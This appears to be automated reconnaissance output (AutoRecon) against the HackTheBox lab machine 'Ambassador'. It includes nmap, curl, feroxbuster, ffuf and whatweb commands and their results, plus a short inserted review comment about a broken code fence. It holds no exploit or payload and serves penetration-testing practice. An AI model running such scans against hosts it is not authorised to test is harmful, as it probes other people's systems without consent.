SF:ptions:\x20deny\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Tu
SF:e,\x2024\x20Jan\x202023\x2012:23:02\x20GMT\r\nContent-Length:\x200\r\n\
SF:r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-T
SF:ype:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400
SF:\x20Bad\x20Request")%r(Hello,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n
SF:Content-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r
SF:\n\r\n400\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20B
SF:ad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConne
SF:ction:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,6
SF:7,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x
SF:20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%
SF:r(TLSSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:
SF:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20
SF:Bad\x20Request")%r(SSLv23SessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Requ
SF:est\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20
SF:close\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 24 07:27:43 2023 -- 1 IP address (1 host up) scanned in 294.24 seconds
```


@@ -0,0 +1,71 @@
```bash
nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/xml/tcp_22_ssh_nmap.xml" 10.10.11.183
```
[/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/tcp_22_ssh_nmap.txt](file:///home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/tcp_22_ssh_nmap.txt):
```
# Nmap 7.93 scan initiated Tue Jan 24 07:27:43 2023 as: nmap -vv --reason -Pn -T4 -sV -p 22 --script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/xml/tcp_22_ssh_nmap.xml 10.10.11.183
Nmap scan report for ambassador.htb (10.10.11.183)
Host is up, received user-set (0.058s latency).
Scanned at 2023-01-24 07:27:44 EST for 1s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-auth-methods:
| Supported authentication methods:
| publickey
|_ password
|_banner: SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5
| ssh-hostkey:
| 3072 29dd8ed7171e8e3090873cc651007c75 (RSA)
| ssh-rsa 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
| 256 80a4c52e9ab1ecda276439a408973bef (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFgGRouCNEVCXufz6UDFKYkcd3Lmm6WoGKl840u6TuJ8+SKv77LDiJzsXlqcjdeHXA5O87Us7Npwydhw9NYXXYs=
| 256 f590ba7ded55cb7007f2bbc891931bf6 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINujB7zPDP2GyNBT4Dt4hGiheNd9HOUMN/5Spa21Kg0W
| ssh2-enum-algos:
| kex_algorithms: (9)
| curve25519-sha256
| curve25519-sha256@libssh.org
| ecdh-sha2-nistp256
| ecdh-sha2-nistp384
| ecdh-sha2-nistp521
| diffie-hellman-group-exchange-sha256
| diffie-hellman-group16-sha512
| diffie-hellman-group18-sha512
| diffie-hellman-group14-sha256
| server_host_key_algorithms: (5)
| rsa-sha2-512
| rsa-sha2-256
| ssh-rsa
| ecdsa-sha2-nistp256
| ssh-ed25519
| encryption_algorithms: (6)
| chacha20-poly1305@openssh.com
| aes128-ctr
| aes192-ctr
| aes256-ctr
| aes128-gcm@openssh.com
| aes256-gcm@openssh.com
| mac_algorithms: (10)
| umac-64-etm@openssh.com
| umac-128-etm@openssh.com
| hmac-sha2-256-etm@openssh.com
| hmac-sha2-512-etm@openssh.com
| hmac-sha1-etm@openssh.com
| umac-64@openssh.com
| umac-128@openssh.com
| hmac-sha2-256
| hmac-sha2-512
| hmac-sha1
| compression_algorithms: (2)
| none
|_ zlib@openssh.com
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 24 07:27:45 2023 -- 1 IP address (1 host up) scanned in 1.87 seconds
```


@@ -0,0 +1,32 @@
```bash
nmap -vv --reason -Pn -T4 -sV -p 3306 --script="banner,(mysql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/tcp_3306_mysql_nmap.txt" -oX "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/xml/tcp_3306_mysql_nmap.xml" 10.10.11.183
```
[/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/tcp_3306_mysql_nmap.txt](file:///home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/tcp_3306_mysql_nmap.txt):
```
# Nmap 7.93 scan initiated Tue Jan 24 07:27:43 2023 as: nmap -vv --reason -Pn -T4 -sV -p 3306 "--script=banner,(mysql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/tcp_3306_mysql_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/xml/tcp_3306_mysql_nmap.xml 10.10.11.183
Nmap scan report for ambassador.htb (10.10.11.183)
Host is up, received user-set (0.038s latency).
Scanned at 2023-01-24 07:27:44 EST for 108s
PORT STATE SERVICE REASON VERSION
3306/tcp open mysql syn-ack MySQL 8.0.30-0ubuntu0.20.04.2
| mysql-info:
| Protocol: 10
| Version: 8.0.30-0ubuntu0.20.04.2
| Thread ID: 61
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, Speaks41ProtocolOld, LongPassword, ConnectWithDatabase, ODBCClient, SupportsTransactions, LongColumnFlag, FoundRows, SwitchToSSLAfterHandshake, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, Speaks41ProtocolNew, IgnoreSigpipes, DontAllowDatabaseTableColumn, InteractiveClient, SupportsCompression, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: ; E\x18{q7/Y&NBxIZ\x132(&Y
|_ Auth Plugin Name: caching_sha2_password
| banner: [\x00\x00\x00\x0A8.0.30-0ubuntu0.20.04.2\x00?\x00\x00\x00"Rcm%P
| \x19Z\x00\xFF\xFF\xFF\x02\x00\xFF\xDF\x15\x00\x00\x00\x00\x00\x00\x00\x
|_00\x00\x009i1\,\x1C`P\x02g{+\x00caching_sha2_password\x00
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 24 07:29:32 2023 -- 1 IP address (1 host up) scanned in 108.73 seconds
```


@@ -0,0 +1,3 @@
```bash
curl -sSikf http://10.10.11.183:80/robots.txt
```


@@ -0,0 +1,174 @@
```bash
curl -sSik http://10.10.11.183:80/
```
[/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_curl.html](file:///home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_curl.html):
```
HTTP/1.1 200 OK
Date: Tue, 24 Jan 2023 12:27:44 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Fri, 02 Sep 2022 01:37:04 GMT
ETag: "e46-5e7a7c4652f79"
Accept-Ranges: bytes
Content-Length: 3654
Vary: Accept-Encoding
Content-Type: text/html
<!DOCTYPE html>
<html lang="en-us">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>Ambassador Development Server</title>
<meta name="viewport" content="width=device-width,minimum-scale=1">
<meta name="description" content="">
<meta name="generator" content="Hugo 0.94.2" />
<meta name="robots" content="noindex, nofollow">
<link rel="stylesheet" href="/ananke/css/main.min.css" >
<link href="/index.xml" rel="alternate" type="application/rss+xml" title="Ambassador Development Server" />
<link href="/index.xml" rel="feed" type="application/rss+xml" title="Ambassador Development Server" />
<meta property="og:title" content="Ambassador Development Server" />
<meta property="og:description" content="" />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://example.org/" />
<meta itemprop="name" content="Ambassador Development Server">
<meta itemprop="description" content=""><meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Ambassador Development Server"/>
<meta name="twitter:description" content=""/>
</head>
<body class="ma0 avenir bg-near-white">
<header>
<div class="pb3-m pb6-l bg-black">
<nav class="pv3 ph3 ph4-ns" role="navigation">
<div class="flex-l justify-between items-center center">
<a href="/" class="f3 fw2 hover-white no-underline white-90 dib">
Ambassador Development Server
</a>
<div class="flex-l items-center">
<div class="ananke-socials">
</div>
</div>
</div>
</nav>
<div class="tc-l pv3 ph3 ph4-ns">
<h1 class="f2 f-subheadline-l fw2 light-silver mb0 lh-title">
Ambassador Development Server
</h1>
</div>
</div>
</header>
<main class="pb7" role="main">
<article class="cf ph3 ph5-l pv3 pv4-l f4 tc-l center measure-wide lh-copy mid-gray">
</article>
<div class="pa3 pa4-ns w-100 w-70-ns center">
<h1 class="flex-none">
Recent Posts
</h1>
<section class="w-100 mw8">
<div class="relative w-100 mb4">
<article class="bb b--black-10">
<div class="db pv4 ph3 ph0-l no-underline dark-gray">
<div class="flex flex-column flex-row-ns">
<div class="blah w-100">
<h1 class="f3 fw1 athelas mt0 lh-title">
<a href="/posts/welcome-to-the-ambassador-development-server/" class="color-inherit dim link">
Welcome to the Ambassador Development Server
</a>
</h1>
<div class="f6 f5-l lh-copy nested-copy-line-height nested-links">
Hi there! This server exists to provide developers at Ambassador with a standalone development environment. When you start as a developer at Ambassador, you will be assigned a development server of your own to use.
Connecting to this machine Use the developer account to SSH, DevOps will give you the password.
</div>
<a href="/posts/welcome-to-the-ambassador-development-server/" class="ba b--moon-gray bg-light-gray br2 color-inherit dib f7 hover-bg-moon-gray link mt2 ph2 pv1">read more</a>
</div>
</div>
</div>
</article>
</div>
</section>
</div>
</main>
<footer>
<div>
<p>
Ambassador Inc.
</p>
</div>
</footer>
</body>
</html>
```


@@ -0,0 +1,42 @@
```bash
feroxbuster -u http://10.10.11.183:80/ -t 10 -w /home/kali/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
```
[/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt](file:///home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt):
```
200 GET 1l 242w 75263c http://10.10.11.183/ananke/css/main.min.css
200 GET 21l 101w 1230c http://10.10.11.183/index.xml
200 GET 155l 305w 3654c http://10.10.11.183/
403 GET 9l 28w 277c http://10.10.11.183/.html
403 GET 9l 28w 277c http://10.10.11.183/.hta
403 GET 9l 28w 277c http://10.10.11.183/.htpasswd
403 GET 9l 28w 277c http://10.10.11.183/.htaccess
403 GET 9l 28w 277c http://10.10.11.183/.htpasswd.txt
403 GET 9l 28w 277c http://10.10.11.183/.hta.txt
403 GET 9l 28w 277c http://10.10.11.183/.htaccess.txt
403 GET 9l 28w 277c http://10.10.11.183/.htpasswd.html
403 GET 9l 28w 277c http://10.10.11.183/.hta.html
403 GET 9l 28w 277c http://10.10.11.183/.htaccess.html
403 GET 9l 28w 277c http://10.10.11.183/.htpasswd.php
403 GET 9l 28w 277c http://10.10.11.183/.hta.php
403 GET 9l 28w 277c http://10.10.11.183/.htaccess.php
403 GET 9l 28w 277c http://10.10.11.183/.hta.asp
403 GET 9l 28w 277c http://10.10.11.183/.htpasswd.asp
403 GET 9l 28w 277c http://10.10.11.183/.htaccess.asp
403 GET 9l 28w 277c http://10.10.11.183/.htpasswd.aspx
403 GET 9l 28w 277c http://10.10.11.183/.hta.aspx
403 GET 9l 28w 277c http://10.10.11.183/.htaccess.aspx
403 GET 9l 28w 277c http://10.10.11.183/.htpasswd.jsp
403 GET 9l 28w 277c http://10.10.11.183/.hta.jsp
403 GET 9l 28w 277c http://10.10.11.183/.htaccess.jsp
200 GET 92l 143w 1793c http://10.10.11.183/404.html
301 GET 9l 28w 317c http://10.10.11.183/categories => http://10.10.11.183/categories/
301 GET 9l 28w 313c http://10.10.11.183/images => http://10.10.11.183/images/
200 GET 155l 305w 3654c http://10.10.11.183/index.html
301 GET 9l 28w 312c http://10.10.11.183/posts => http://10.10.11.183/posts/
403 GET 9l 28w 277c http://10.10.11.183/server-status
200 GET 18l 22w 645c http://10.10.11.183/sitemap.xml
301 GET 9l 28w 311c http://10.10.11.183/tags => http://10.10.11.183/tags/
```


@@ -0,0 +1,3 @@
```bash
curl -sSikf http://10.10.11.183:80/.well-known/security.txt
```


@@ -0,0 +1,117 @@
```bash
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.10.11.183
```
[/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_nmap.txt](file:///home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_nmap.txt):
```
# Nmap 7.93 scan initiated Tue Jan 24 07:27:43 2023 as: nmap -vv --reason -Pn -T4 -sV -p 80 "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/xml/tcp_80_http_nmap.xml 10.10.11.183
Nmap scan report for ambassador.htb (10.10.11.183)
Host is up, received user-set (0.036s latency).
Scanned at 2023-01-24 07:27:44 EST for 18s
Bug in http-security-headers: no string output.
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-mobileversion-checker: No mobile version detected.
|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
|_http-errors: Couldn't find any error pages.
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
|_http-referer-checker: Couldn't find any cross-domain scripts.
|_http-malware-host: Host appears to be clean
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-generator: Hugo 0.94.2
|_http-chrono: Request times for /; avg: 196.43ms; min: 171.38ms; max: 209.87ms
|_http-date: Tue, 24 Jan 2023 12:27:51 GMT; 0s from local time.
| http-feed:
| Spidering limited to: maxpagecount=40; withinhost=ambassador.htb
| Found the following feeds:
|_ RSS (version 2.0): http://ambassador.htb:80/index.xml
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-useragent-tester:
| Status for browser useragent: 200
| Allowed User Agents:
| Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
| libwww
| lwp-trivial
| libcurl-agent/1.0
| PHP/
| Python-urllib/2.5
| GT::WWW
| Snoopy
| MFC_Tear_Sample
| HTTP::Lite
| PHPCrawl
| URI::Fetch
| Zend_Http_Client
| http client
| PECL::HTTP
| Wget/1.13.4 (linux-gnu)
|_ WWW-Mechanize/1.34
|_http-fetch: Please enter the complete path of the directory to save data in.
| http-vhosts:
|_128 names had status 200
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
| http-sitemap-generator:
| Directory structure:
| /
| Other: 1; xml: 1
| /ananke/css/
| css: 1
| /posts/welcome-to-the-ambassador-development-server/
| Other: 1
| Longest directory structure:
| Depth: 2
| Dir: /posts/welcome-to-the-ambassador-development-server/
| Total files found (by extension):
|_ Other: 2; css: 1; xml: 1
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-title: Ambassador Development Server
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-comments-displayer:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=ambassador.htb
|
| Path: http://ambassador.htb:80/ananke/css/main.min.css
| Line number: 1
| Comment:
| /*!normalize.css v8.0.0 | MIT License | github.com/necolas/normalize.css*/
|
| Path: http://ambassador.htb:80/ananke/css/main.min.css
| Line number: 1
| Comment:
| /*!TACHYONS v4.12.0 | http://tachyons.io*/
|
| Path: http://ambassador.htb:80/ananke/css/main.min.css
| Line number: 1
| Comment:
|_ /*!TACHYONS v4.9.1 | http://tachyons.io*/
|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 127.0.1.1
| http-headers:
| Date: Tue, 24 Jan 2023 12:27:52 GMT
| Server: Apache/2.4.41 (Ubuntu)
| Last-Modified: Fri, 02 Sep 2022 01:37:04 GMT
| ETag: "e46-5e7a7c4652f79"
| Accept-Ranges: bytes
| Content-Length: 3654
| Vary: Accept-Encoding
| Connection: close
| Content-Type: text/html
|
|_ (Request type: HEAD)
| http-php-version: Logo query returned unknown hash 4e8656a1e2c09ff4135b58519f82a327
|_Credits query returned unknown hash 4e8656a1e2c09ff4135b58519f82a327
|_http-config-backup: ERROR: Script execution failed (use -d to debug)
|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-enum:
|_ /images/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 24 07:28:02 2023 -- 1 IP address (1 host up) scanned in 18.76 seconds
```


@@ -0,0 +1,11 @@
```bash
curl -sk -o /dev/null -H "Host: awJNEHhLWvIHZHvuoHrK.ambassador.htb" http://ambassador.htb:80/ -w "%{size_download}"
``````bash
ffuf -u http://ambassador.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.ambassador.htb" -fs 3654 -noninteractive -s | tee "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_ambassador.htb_vhosts_subdomains-top1million-110000.txt"
```
[/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_ambassador.htb_vhosts_subdomains-top1million-110000.txt](file:///home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_ambassador.htb_vhosts_subdomains-top1million-110000.txt):
```
```
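Review bot: The third line of this report fuses the closing fence of the curl block with the opening fence of the ffuf block into one line of six backticks followed by `bash`; because text follows the backticks it is not a valid closing fence, so the first block stays open and both commands render as a single block with the stray fence line inside it. Putting the closing fence and the `bash` opening fence on separate lines, with a blank line between them, restores two blocks. The final fenced block is empty, which presumably means ffuf found no virtual host whose response size differed from the 3654 bytes filtered by `-fs 3654`; a one-line sentence saying so would make the negative result explicit instead of leaving an empty block. The file looks tool-generated, so the fix may belong in the report template rather than in this copy.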


@@ -0,0 +1,78 @@
```bash
whatweb --color=never --no-errors -a 3 -v http://10.10.11.183:80 2>&1
```
[/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_whatweb.txt](file:///home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_whatweb.txt):
```
WhatWeb report for http://10.10.11.183:80
Status : 200 OK
Title : Ambassador Development Server
IP : 10.10.11.183
Country : RESERVED, ZZ
Summary : Apache[2.4.41], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], MetaGenerator[Hugo 0.94.2], Open-Graph-Protocol[website], X-UA-Compatible[IE=edge]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.41 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Ubuntu Linux
String : Apache/2.4.41 (Ubuntu) (from server string)
[ MetaGenerator ]
This plugin identifies meta generator tags and extracts its
value.
String : Hugo 0.94.2
[ Open-Graph-Protocol ]
The Open Graph protocol enables you to integrate your Web
pages into the social graph. It is currently designed for
Web pages representing profiles of real-world things .
things like movies, sports teams, celebrities, and
restaurants. Including Open Graph tags on your Web page,
makes your page equivalent to a Facebook Page.
Version : website
[ X-UA-Compatible ]
This plugin retrieves the X-UA-Compatible value from the
HTTP header and meta http-equiv tag. - More Info:
http://msdn.microsoft.com/en-us/library/cc817574.aspx
String : IE=edge
HTTP Headers:
HTTP/1.1 200 OK
Date: Tue, 24 Jan 2023 12:27:48 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Fri, 02 Sep 2022 01:37:04 GMT
ETag: "e46-5e7a7c4652f79-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1310
Connection: close
Content-Type: text/html
```


@@ -0,0 +1,3 @@
```bash
wkhtmltoimage --format png http://10.10.11.183:80/ /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_screenshot.png
```


@@ -0,0 +1,26 @@
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/ambassador/results/10.10.11.183/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/ambassador/results/10.10.11.183/scans/xml/_quick_tcp_nmap.xml" 10.10.11.183
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/ambassador/results/10.10.11.183/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/ambassador/results/10.10.11.183/scans/xml/_full_tcp_nmap.xml" 10.10.11.183
nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/xml/tcp_22_ssh_nmap.xml" 10.10.11.183
feroxbuster -u http://10.10.11.183:80/ -t 10 -w /home/kali/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
curl -sSikf http://10.10.11.183:80/.well-known/security.txt
curl -sSikf http://10.10.11.183:80/robots.txt
curl -sSik http://10.10.11.183:80/
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.10.11.183
curl -sk -o /dev/null -H "Host: awJNEHhLWvIHZHvuoHrK.ambassador.htb" http://ambassador.htb:80/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v http://10.10.11.183:80 2>&1
wkhtmltoimage --format png http://10.10.11.183:80/ /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_screenshot.png
nmap -vv --reason -Pn -T4 -sV -p 3306 --script="banner,(mysql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/tcp_3306_mysql_nmap.txt" -oX "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/xml/tcp_3306_mysql_nmap.xml" 10.10.11.183
ffuf -u http://ambassador.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.ambassador.htb" -fs 3654 -noninteractive -s | tee "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_ambassador.htb_vhosts_subdomains-top1million-110000.txt"


@@ -0,0 +1,101 @@
# Nmap 7.93 scan initiated Tue Jan 24 07:22:49 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/_full_tcp_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/xml/_full_tcp_nmap.xml 10.10.11.183
Nmap scan report for ambassador.htb (10.10.11.183)
Host is up, received user-set (0.078s latency).
Scanned at 2023-01-24 07:22:49 EST for 335s
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 29dd8ed7171e8e3090873cc651007c75 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDLYy5+VCwR+2NKWpIRhSVGI1nJQ5YeihevJqIYbfopEW03vZ9SgacRzs4coGfDbcYa+KPePbz2n+2zXytEPfzBzFysLXgTaUlDFcDqEsWP9pJ5UYFNfXqHCOyDRklsetFOBcxkgC8/IcHDJdJQTEr51KLF75ZXaEIcjZ+XuQWsOrU5DJPrAlCmG12OMjsnP4OfI4RpIjELuLCyVSItoin255/99SSM3koBheX0im9/V8IOpEye9Fc2LigyGA+97wwNSZG2G/duS6lE8pYz1unL+Vg2ogGDN85TkkrS3XdfDLI87AyFBGYniG8+SMtLQOd6tCZeymGK2BQe1k9oWoB7/J6NJ0dylAPAVZ1sDAU7KCUPNAex8q6bh0KrO/5zVbpwMB+qEq6SY6crjtfpYnd7+2DLwiYgcSiQxZMnY3ZkJiIf6s5FkJYmcf/oX1xm/TlP9qoxRKYqLtEJvAHEk/mK+na1Esc8yuPItSRaQzpCgyIwiZCdQlTwWBCVFJZqrXc=
| 256 80a4c52e9ab1ecda276439a408973bef (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFgGRouCNEVCXufz6UDFKYkcd3Lmm6WoGKl840u6TuJ8+SKv77LDiJzsXlqcjdeHXA5O87Us7Npwydhw9NYXXYs=
| 256 f590ba7ded55cb7007f2bbc891931bf6 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINujB7zPDP2GyNBT4Dt4hGiheNd9HOUMN/5Spa21Kg0W
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Hugo 0.94.2
|_http-title: Ambassador Development Server
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
3000/tcp open ppp? syn-ack
| fingerprint-strings:
| GenericLines, Hello, Help, RTSPRequest, SSLSessionReq, SSLv23SessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Tue, 24 Jan 2023 12:23:34 GMT
| Content-Length: 29
| href="/login">Found</a>.
| HTTPOptions:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Tue, 24 Jan 2023 12:23:39 GMT
|_ Content-Length: 0
3306/tcp open mysql syn-ack MySQL 8.0.30-0ubuntu0.20.04.2
| mysql-info:
| Protocol: 10
| Version: 8.0.30-0ubuntu0.20.04.2
| Thread ID: 66
| Capabilities flags: 65535
| Some Capabilities: SupportsLoadDataLocal, Speaks41ProtocolNew, SupportsTransactions, ODBCClient, Support41Auth, SupportsCompression, ConnectWithDatabase, Speaks41ProtocolOld, FoundRows, IgnoreSigpipes, SwitchToSSLAfterHandshake, IgnoreSpaceBeforeParenthesis, InteractiveClient, LongColumnFlag, LongPassword, DontAllowDatabaseTableColumn, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
| Status: Autocommit
